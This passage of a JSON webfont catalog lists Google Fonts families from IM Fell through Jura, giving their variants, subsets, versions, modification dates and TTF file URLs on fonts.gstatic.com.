        "regular": "http://fonts.gstatic.com/s/imfellfrenchcanon/v10/-F6ufiNtDWYfYc-tDiyiw08rrghJszkK6coVPt1ozoPz.ttf",
        "italic": "http://fonts.gstatic.com/s/imfellfrenchcanon/v10/-F6gfiNtDWYfYc-tDiyiw08rrghJszkK6foXNNlKy5PzzrU.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "IM Fell French Canon SC",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/imfellfrenchcanonsc/v10/FBVmdCru5-ifcor2bgq9V89khWcmQghEURY7H3c0UBCVIVqH.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "IM Fell Great Primer",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/imfellgreatprimer/v10/bx6aNwSJtayYxOkbYFsT6hMsLzX7u85rJorXvDo3SQY1.ttf",
        "italic": "http://fonts.gstatic.com/s/imfellgreatprimer/v10/bx6UNwSJtayYxOkbYFsT6hMsLzX7u85rJrrVtj4VTBY1N6U.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "IM Fell Great Primer SC",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/imfellgreatprimersc/v10/ga6daxBOxyt6sCqz3fjZCTFCTUDMHagsQKdDTLf9BXz0s8FG.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ibarra Real Nova",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "italic",
        "500italic",
        "600italic",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v5",
      "lastModified": "2020-11-06",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ibarrarealnova/v5/sZlSdQiA-DBIDCcaWtQzL4BZHoiDundw4ATyjed3EXdg5MDtVT9TWIvS.ttf",
        "500": "http://fonts.gstatic.com/s/ibarrarealnova/v5/sZlSdQiA-DBIDCcaWtQzL4BZHoiDundw4ATyjed3EXdS5MDtVT9TWIvS.ttf",
        "600": "http://fonts.gstatic.com/s/ibarrarealnova/v5/sZlSdQiA-DBIDCcaWtQzL4BZHoiDundw4ATyjed3EXe-48DtVT9TWIvS.ttf",
        "700": "http://fonts.gstatic.com/s/ibarrarealnova/v5/sZlSdQiA-DBIDCcaWtQzL4BZHoiDundw4ATyjed3EXeH48DtVT9TWIvS.ttf",
        "italic": "http://fonts.gstatic.com/s/ibarrarealnova/v5/sZlsdQiA-DBIDCcaWtQzL4BZHoiDkH5CH9yb5n3ZFmKopyiuXztxXZvSkTo.ttf",
        "500italic": "http://fonts.gstatic.com/s/ibarrarealnova/v5/sZlsdQiA-DBIDCcaWtQzL4BZHoiDkH5CH9yb5n3ZFmKopxquXztxXZvSkTo.ttf",
        "600italic": "http://fonts.gstatic.com/s/ibarrarealnova/v5/sZlsdQiA-DBIDCcaWtQzL4BZHoiDkH5CH9yb5n3ZFmKop_apXztxXZvSkTo.ttf",
        "700italic": "http://fonts.gstatic.com/s/ibarrarealnova/v5/sZlsdQiA-DBIDCcaWtQzL4BZHoiDkH5CH9yb5n3ZFmKop8-pXztxXZvSkTo.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Iceberg",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/iceberg/v8/8QIJdijAiM7o-qnZuIgOq7jkAOw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Iceland",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/iceland/v9/rax9HiuFsdMNOnWPWKxGADBbg0s.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Imprima",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/imprima/v9/VEMxRoN7sY3yuy-7-oWHyDzktPo.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Inconsolata",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v20",
      "lastModified": "2020-06-26",
      "files": {
        "200": "http://fonts.gstatic.com/s/inconsolata/v20/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7LppwU8aRr8lleY2co.ttf",
        "300": "http://fonts.gstatic.com/s/inconsolata/v20/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lpp9s8aRr8lleY2co.ttf",
        "regular": "http://fonts.gstatic.com/s/inconsolata/v20/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lpp4U8aRr8lleY2co.ttf",
        "500": "http://fonts.gstatic.com/s/inconsolata/v20/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lpp7c8aRr8lleY2co.ttf",
        "600": "http://fonts.gstatic.com/s/inconsolata/v20/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lpp1s7aRr8lleY2co.ttf",
        "700": "http://fonts.gstatic.com/s/inconsolata/v20/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lpp2I7aRr8lleY2co.ttf",
        "800": "http://fonts.gstatic.com/s/inconsolata/v20/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7LppwU7aRr8lleY2co.ttf",
        "900": "http://fonts.gstatic.com/s/inconsolata/v20/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lppyw7aRr8lleY2co.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Inder",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/inder/v9/w8gUH2YoQe8_4vq6pw-P3U4O.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Indie Flower",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-09-10",
      "files": {
        "regular": "http://fonts.gstatic.com/s/indieflower/v12/m8JVjfNVeKWVnh3QMuKkFcZlbkGG1dKEDw.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Inika",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/inika/v9/rnCm-x5X3QP-phTHRcc2s2XH.ttf",
        "700": "http://fonts.gstatic.com/s/inika/v9/rnCr-x5X3QP-pix7auM-mHnOSOuk.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Inknut Antiqua",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-11-06",
      "files": {
        "300": "http://fonts.gstatic.com/s/inknutantiqua/v7/Y4GRYax7VC4ot_qNB4nYpBdaKU2vwrj5bBoIYJNf.ttf",
        "regular": "http://fonts.gstatic.com/s/inknutantiqua/v7/Y4GSYax7VC4ot_qNB4nYpBdaKXUD6pzxRwYB.ttf",
        "500": "http://fonts.gstatic.com/s/inknutantiqua/v7/Y4GRYax7VC4ot_qNB4nYpBdaKU33w7j5bBoIYJNf.ttf",
        "600": "http://fonts.gstatic.com/s/inknutantiqua/v7/Y4GRYax7VC4ot_qNB4nYpBdaKU3bxLj5bBoIYJNf.ttf",
        "700": "http://fonts.gstatic.com/s/inknutantiqua/v7/Y4GRYax7VC4ot_qNB4nYpBdaKU2_xbj5bBoIYJNf.ttf",
        "800": "http://fonts.gstatic.com/s/inknutantiqua/v7/Y4GRYax7VC4ot_qNB4nYpBdaKU2jxrj5bBoIYJNf.ttf",
        "900": "http://fonts.gstatic.com/s/inknutantiqua/v7/Y4GRYax7VC4ot_qNB4nYpBdaKU2Hx7j5bBoIYJNf.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Inria Sans",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/inriasans/v2/ptRPTiqXYfZMCOiVj9kQ3ELaDQtFqeY3fX4.ttf",
        "300italic": "http://fonts.gstatic.com/s/inriasans/v2/ptRRTiqXYfZMCOiVj9kQ1OzAgQlPrcQybX4pQA.ttf",
        "regular": "http://fonts.gstatic.com/s/inriasans/v2/ptRMTiqXYfZMCOiVj9kQ5O7yKQNute8.ttf",
        "italic": "http://fonts.gstatic.com/s/inriasans/v2/ptROTiqXYfZMCOiVj9kQ1Oz4LSFrpe8uZA.ttf",
        "700": "http://fonts.gstatic.com/s/inriasans/v2/ptRPTiqXYfZMCOiVj9kQ3FLdDQtFqeY3fX4.ttf",
        "700italic": "http://fonts.gstatic.com/s/inriasans/v2/ptRRTiqXYfZMCOiVj9kQ1OzAkQ5PrcQybX4pQA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Inria Serif",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/inriaserif/v2/fC14PYxPY3rXxEndZJAzN3wAVQjFhFyta3xN.ttf",
        "300italic": "http://fonts.gstatic.com/s/inriaserif/v2/fC16PYxPY3rXxEndZJAzN3SuT4THjliPbmxN0_E.ttf",
        "regular": "http://fonts.gstatic.com/s/inriaserif/v2/fC1lPYxPY3rXxEndZJAzN0SsfSzNr0Ck.ttf",
        "italic": "http://fonts.gstatic.com/s/inriaserif/v2/fC1nPYxPY3rXxEndZJAzN3SudyjvqlCkcmU.ttf",
        "700": "http://fonts.gstatic.com/s/inriaserif/v2/fC14PYxPY3rXxEndZJAzN3wQUgjFhFyta3xN.ttf",
        "700italic": "http://fonts.gstatic.com/s/inriaserif/v2/fC16PYxPY3rXxEndZJAzN3SuT5TAjliPbmxN0_E.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Inter",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v2",
      "lastModified": "2020-06-26",
      "files": {
        "100": "http://fonts.gstatic.com/s/inter/v2/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyeMZhrib2Bg-4.ttf",
        "200": "http://fonts.gstatic.com/s/inter/v2/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuDyfMZhrib2Bg-4.ttf",
        "300": "http://fonts.gstatic.com/s/inter/v2/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuOKfMZhrib2Bg-4.ttf",
        "regular": "http://fonts.gstatic.com/s/inter/v2/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyfMZhrib2Bg-4.ttf",
        "500": "http://fonts.gstatic.com/s/inter/v2/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuI6fMZhrib2Bg-4.ttf",
        "600": "http://fonts.gstatic.com/s/inter/v2/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuGKYMZhrib2Bg-4.ttf",
        "700": "http://fonts.gstatic.com/s/inter/v2/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuFuYMZhrib2Bg-4.ttf",
        "800": "http://fonts.gstatic.com/s/inter/v2/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuDyYMZhrib2Bg-4.ttf",
        "900": "http://fonts.gstatic.com/s/inter/v2/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuBWYMZhrib2Bg-4.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Irish Grover",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-15",
      "files": {
        "regular": "http://fonts.gstatic.com/s/irishgrover/v10/buExpoi6YtLz2QW7LA4flVgf-P5Oaiw4cw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Istok Web",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v15",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/istokweb/v15/3qTvojGmgSyUukBzKslZAWF-9kIIaQ.ttf",
        "italic": "http://fonts.gstatic.com/s/istokweb/v15/3qTpojGmgSyUukBzKslpA2t61EcYaQ7F.ttf",
        "700": "http://fonts.gstatic.com/s/istokweb/v15/3qTqojGmgSyUukBzKslhvU5a_mkUYBfcMw.ttf",
        "700italic": "http://fonts.gstatic.com/s/istokweb/v15/3qT0ojGmgSyUukBzKslpA1PG-2MQQhLMMygN.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Italiana",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/italiana/v9/QldNNTtLsx4E__B0XTmRY31Wx7Vv.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Italianno",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/italianno/v10/dg4n_p3sv6gCJkwzT6Rnj5YpQwM-gg.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Itim",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/itim/v4/0nknC9ziJOYewARKkc7ZdwU.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Jacques Francois",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/jacquesfrancois/v8/ZXu9e04ZvKeOOHIe1TMahbcIU2cgmcPqoeRWfbs.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Jacques Francois Shadow",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/jacquesfrancoisshadow/v9/KR1FBtOz8PKTMk-kqdkLVrvR0ECFrB6Pin-2_q8VsHuV5ULS.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Jaldi",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/jaldi/v7/or3sQ67z0_CI30NUZpD_B6g8.ttf",
        "700": "http://fonts.gstatic.com/s/jaldi/v7/or3hQ67z0_CI33voSbT3LLQ1niPn.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Jim Nightshade",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/jimnightshade/v8/PlIkFlu9Pb08Q8HLM1PxmB0g-OS4V3qKaMxD.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Jockey One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/jockeyone/v10/HTxpL2g2KjCFj4x8WI6ArIb7HYOk4xc.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Jolly Lodger",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/jollylodger/v8/BXRsvFTAh_bGkA1uQ48dlB3VWerT3ZyuqA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Jomhuria",
      "variants": [
        "regular"
      ],
      "subsets": [
        "arabic",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/jomhuria/v9/Dxxp8j-TMXf-llKur2b1MOGbC3Dh.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Jomolhari",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "tibetan"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/jomolhari/v2/EvONzA1M1Iw_CBd2hsQCF1IZKq5INg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Josefin Sans",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "100italic",
        "200italic",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v16",
      "lastModified": "2020-06-26",
      "files": {
        "100": "http://fonts.gstatic.com/s/josefinsans/v16/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_DjRXMFrLgTsQV0.ttf",
        "200": "http://fonts.gstatic.com/s/josefinsans/v16/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_LjQXMFrLgTsQV0.ttf",
        "300": "http://fonts.gstatic.com/s/josefinsans/v16/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_GbQXMFrLgTsQV0.ttf",
        "regular": "http://fonts.gstatic.com/s/josefinsans/v16/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_DjQXMFrLgTsQV0.ttf",
        "500": "http://fonts.gstatic.com/s/josefinsans/v16/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_ArQXMFrLgTsQV0.ttf",
        "600": "http://fonts.gstatic.com/s/josefinsans/v16/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_ObXXMFrLgTsQV0.ttf",
        "700": "http://fonts.gstatic.com/s/josefinsans/v16/Qw3PZQNVED7rKGKxtqIqX5E-AVSJrOCfjY46_N_XXMFrLgTsQV0.ttf",
        "100italic": "http://fonts.gstatic.com/s/josefinsans/v16/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCTtINhKibpUV3MEQ.ttf",
        "200italic": "http://fonts.gstatic.com/s/josefinsans/v16/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCTNIJhKibpUV3MEQ.ttf",
        "300italic": "http://fonts.gstatic.com/s/josefinsans/v16/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCT6oJhKibpUV3MEQ.ttf",
        "italic": "http://fonts.gstatic.com/s/josefinsans/v16/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCTtIJhKibpUV3MEQ.ttf",
        "500italic": "http://fonts.gstatic.com/s/josefinsans/v16/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCThoJhKibpUV3MEQ.ttf",
        "600italic": "http://fonts.gstatic.com/s/josefinsans/v16/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCTaoVhKibpUV3MEQ.ttf",
        "700italic": "http://fonts.gstatic.com/s/josefinsans/v16/Qw3JZQNVED7rKGKxtqIqX5EUCGZ2dIn0FyA96fCTU4VhKibpUV3MEQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Josefin Slab",
      "variants": [
        "100",
        "100italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/josefinslab/v11/lW-nwjwOK3Ps5GSJlNNkMalvyQ6qBM7oPxMX.ttf",
        "100italic": "http://fonts.gstatic.com/s/josefinslab/v11/lW-lwjwOK3Ps5GSJlNNkMalnrzbODsrKOgMX95A.ttf",
        "300": "http://fonts.gstatic.com/s/josefinslab/v11/lW-mwjwOK3Ps5GSJlNNkMalvASyKLuDkNgoO7g.ttf",
        "300italic": "http://fonts.gstatic.com/s/josefinslab/v11/lW-kwjwOK3Ps5GSJlNNkMalnrzYGLOrgFA8e7onu.ttf",
        "regular": "http://fonts.gstatic.com/s/josefinslab/v11/lW-5wjwOK3Ps5GSJlNNkMalXrQSuJsv4Pw.ttf",
        "italic": "http://fonts.gstatic.com/s/josefinslab/v11/lW-nwjwOK3Ps5GSJlNNkMalnrw6qBM7oPxMX.ttf",
        "600": "http://fonts.gstatic.com/s/josefinslab/v11/lW-mwjwOK3Ps5GSJlNNkMalvdSqKLuDkNgoO7g.ttf",
        "600italic": "http://fonts.gstatic.com/s/josefinslab/v11/lW-kwjwOK3Ps5GSJlNNkMalnrzZyKurgFA8e7onu.ttf",
        "700": "http://fonts.gstatic.com/s/josefinslab/v11/lW-mwjwOK3Ps5GSJlNNkMalvESuKLuDkNgoO7g.ttf",
        "700italic": "http://fonts.gstatic.com/s/josefinslab/v11/lW-kwjwOK3Ps5GSJlNNkMalnrzYWK-rgFA8e7onu.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Jost",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "100italic",
        "200italic",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext"
      ],
      "version": "v4",
      "lastModified": "2020-09-29",
      "files": {
        "100": "http://fonts.gstatic.com/s/jost/v4/92zPtBhPNqw79Ij1E865zBUv7myjJAVGPokMmuHL.ttf",
        "200": "http://fonts.gstatic.com/s/jost/v4/92zPtBhPNqw79Ij1E865zBUv7mwjJQVGPokMmuHL.ttf",
        "300": "http://fonts.gstatic.com/s/jost/v4/92zPtBhPNqw79Ij1E865zBUv7mz9JQVGPokMmuHL.ttf",
        "regular": "http://fonts.gstatic.com/s/jost/v4/92zPtBhPNqw79Ij1E865zBUv7myjJQVGPokMmuHL.ttf",
        "500": "http://fonts.gstatic.com/s/jost/v4/92zPtBhPNqw79Ij1E865zBUv7myRJQVGPokMmuHL.ttf",
        "600": "http://fonts.gstatic.com/s/jost/v4/92zPtBhPNqw79Ij1E865zBUv7mx9IgVGPokMmuHL.ttf",
        "700": "http://fonts.gstatic.com/s/jost/v4/92zPtBhPNqw79Ij1E865zBUv7mxEIgVGPokMmuHL.ttf",
        "800": "http://fonts.gstatic.com/s/jost/v4/92zPtBhPNqw79Ij1E865zBUv7mwjIgVGPokMmuHL.ttf",
        "900": "http://fonts.gstatic.com/s/jost/v4/92zPtBhPNqw79Ij1E865zBUv7mwKIgVGPokMmuHL.ttf",
        "100italic": "http://fonts.gstatic.com/s/jost/v4/92zJtBhPNqw73oHH7BbQp4-B6XlrZu0ENI0un_HLMEo.ttf",
        "200italic": "http://fonts.gstatic.com/s/jost/v4/92zJtBhPNqw73oHH7BbQp4-B6XlrZm0FNI0un_HLMEo.ttf",
        "300italic": "http://fonts.gstatic.com/s/jost/v4/92zJtBhPNqw73oHH7BbQp4-B6XlrZrMFNI0un_HLMEo.ttf",
        "italic": "http://fonts.gstatic.com/s/jost/v4/92zJtBhPNqw73oHH7BbQp4-B6XlrZu0FNI0un_HLMEo.ttf",
        "500italic": "http://fonts.gstatic.com/s/jost/v4/92zJtBhPNqw73oHH7BbQp4-B6XlrZt8FNI0un_HLMEo.ttf",
        "600italic": "http://fonts.gstatic.com/s/jost/v4/92zJtBhPNqw73oHH7BbQp4-B6XlrZjMCNI0un_HLMEo.ttf",
        "700italic": "http://fonts.gstatic.com/s/jost/v4/92zJtBhPNqw73oHH7BbQp4-B6XlrZgoCNI0un_HLMEo.ttf",
        "800italic": "http://fonts.gstatic.com/s/jost/v4/92zJtBhPNqw73oHH7BbQp4-B6XlrZm0CNI0un_HLMEo.ttf",
        "900italic": "http://fonts.gstatic.com/s/jost/v4/92zJtBhPNqw73oHH7BbQp4-B6XlrZkQCNI0un_HLMEo.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Joti One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/jotione/v9/Z9XVDmdJQAmWm9TwaYTe4u2El6GC.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Jua",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/jua/v8/co3KmW9ljjAjc-DZCsKgsg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Judson",
      "variants": [
        "regular",
        "italic",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v13",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/judson/v13/FeVRS0Fbvbc14VxRD7N01bV7kg.ttf",
        "italic": "http://fonts.gstatic.com/s/judson/v13/FeVTS0Fbvbc14VxhDblw97BrknZf.ttf",
        "700": "http://fonts.gstatic.com/s/judson/v13/FeVSS0Fbvbc14Vxps5xQ3Z5nm29Gww.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Julee",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/julee/v10/TuGfUVB3RpZPQ6ZLodgzydtk.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Julius Sans One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/juliussansone/v9/1Pt2g8TAX_SGgBGUi0tGOYEga5W-xXEW6aGXHw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Junge",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/junge/v8/gokgH670Gl1lUqAdvhB7SnKm.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Jura",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v15",
      "lastModified": "2020-06-26",
      "files": {
        "300": "http://fonts.gstatic.com/s/jura/v15/z7NOdRfiaC4Vd8hhoPzfb5vBTP0D7auhTfmrH_rt.ttf",
        "regular": "http://fonts.gstatic.com/s/jura/v15/z7NOdRfiaC4Vd8hhoPzfb5vBTP1d7auhTfmrH_rt.ttf",
        "500": "http://fonts.gstatic.com/s/jura/v15/z7NOdRfiaC4Vd8hhoPzfb5vBTP1v7auhTfmrH_rt.ttf",
